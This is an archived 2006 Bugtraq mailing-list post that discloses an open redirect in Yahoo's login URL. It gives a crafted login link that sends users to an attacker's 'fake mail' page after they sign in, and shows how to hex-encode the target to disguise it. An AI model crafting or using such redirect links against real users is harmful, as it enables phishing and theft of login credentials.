lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060412105138.6580.qmail@securityfocus.com> Date: 12 Apr 2006 10:51:38 -0000 From: r57shell@...il.com To: bugtraq@...urityfocus.com Subject: a Yahoo Vulnerability /* Advisory */ Homepage: http://www.yahoo.com Found by: Tontonq a.k.a Tontong /* Impact */ This vulnerability can be used to refresh to fake mail /* Credits */ All SpyMS Userz WwW.SpyMasterSnake.org */ Credits /* example: http://login.yahoo.com/config/login?.src=fpctx&.done=http://yourfakemail.com when someone login as sucsefull yahoo will resume to your fake mail adress you may try to encode your fake mail adress like that http://login.yahoo.com/config/login?.src=fpctx&.done=%68%74%74%70%3A%2F%2F%77%77%77%2E%74%6F%6E%74%6F%6E%71%2E%62%65%2F%79%61%68%6F%6F%2F try here http://ha.ckers.org/xss.html a.k.a Tontong & Tontonq Tontonq <<< Lord Of Xss SpyMasterSnake Mechatronic Security Network WwW.SpyMasterSnake.org ;) thnx